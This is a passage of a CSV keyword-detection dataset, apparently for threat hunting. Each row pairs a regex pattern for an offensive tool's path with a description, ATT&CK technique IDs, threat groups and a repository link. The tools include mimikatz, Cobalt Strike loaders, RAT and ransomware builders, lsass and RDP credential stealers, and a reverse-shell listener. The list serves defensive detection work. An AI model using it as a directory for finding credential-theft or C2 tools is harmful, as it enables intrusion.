Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*/rahul1406/cve-2022-0847dirtypipe-exploit*",".{0,1000}\/rahul1406\/cve\-2022\-0847dirtypipe\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/RAI.git*",".{0,1000}\/RAI\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/rakjong/mimikatz_bypassAV/*",".{0,1000}\/rakjong\/mimikatz_bypassAV\/.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/ramnit.profile*",".{0,1000}\/ramnit\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/random-robbie/cve-2022-23131-exp*",".{0,1000}\/random\-robbie\/cve\-2022\-23131\-exp.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","1","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" "*/Ransomware.dll*",".{0,1000}\/Ransomware\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/Ransomware.exe*",".{0,1000}\/Ransomware\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*/Ransomware.pdb*",".{0,1000}\/Ransomware\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/rarce.py*",".{0,1000}\/rarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*/rasman.exe*",".{0,1000}\/rasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*/RasmanPotato*",".{0,1000}\/RasmanPotato.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*/Rat_Generator*",".{0,1000}\/Rat_Generator.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/ratankba.profile*",".{0,1000}\/ratankba\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/ratchatpt.git*",".{0,1000}\/ratchatpt\.git.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatpt.git*",".{0,1000}\/ratchatpt\.git.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.go*",".{0,1000}\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.go*",".{0,1000}\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.syso*",".{0,1000}\/ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.syso*",".{0,1000}\/ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/RationalLove.c",".{0,1000}\/RationalLove\.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rats/badrat_cs/*",".{0,1000}\/rats\/badrat_cs\/.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/rattler.git*",".{0,1000}\/rattler\.git.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*/Rattler_32.exe*",".{0,1000}\/Rattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*/Rattler_x64.exe*",".{0,1000}\/Rattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*/raw/kali/main/*",".{0,1000}\/raw\/kali\/main\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/raw/kali/master/*",".{0,1000}\/raw\/kali\/master\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/raw_shellcode_size.txt*",".{0,1000}\/raw_shellcode_size\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/rawrpc.py*",".{0,1000}\/rawrpc\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*/RC4BinaryEncryption.cs*",".{0,1000}\/RC4BinaryEncryption\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/RC4Payload32.txt*",".{0,1000}\/RC4Payload32\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*/rcat-v*-win-x86_64.exe*",".{0,1000}\/rcat\-v.{0,1000}\-win\-x86_64\.exe.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*/RCStep/CSSG/*",".{0,1000}\/RCStep\/CSSG\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/rdcman.py*",".{0,1000}\/rdcman\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/RDE1.git*",".{0,1000}\/RDE1\.git.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*/rdll_template*",".{0,1000}\/rdll_template.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rdp.py*",".{0,1000}\/rdp\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/rdp_brute.git*",".{0,1000}\/rdp_brute\.git.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*/RDPassSpray.git*",".{0,1000}\/RDPassSpray\.git.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*/RDPCredentialStealer.git*",".{0,1000}\/RDPCredentialStealer\.git.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*/rdp-enum-encryption.nse*",".{0,1000}\/rdp\-enum\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/RDPHook.dll*",".{0,1000}\/RDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*/RDPMITM.py*",".{0,1000}\/RDPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/rdp-ntlm-info.nse*",".{0,1000}\/rdp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rdp-sniffer.cap*",".{0,1000}\/rdp\-sniffer\.cap.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/rdpv.exe*",".{0,1000}\/rdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/rdp-vuln-ms12-020.nse*",".{0,1000}\/rdp\-vuln\-ms12\-020\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/readfile_bof.*",".{0,1000}\/readfile_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","19","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" "*/Readfile_BoF/*",".{0,1000}\/Readfile_BoF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","19","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" 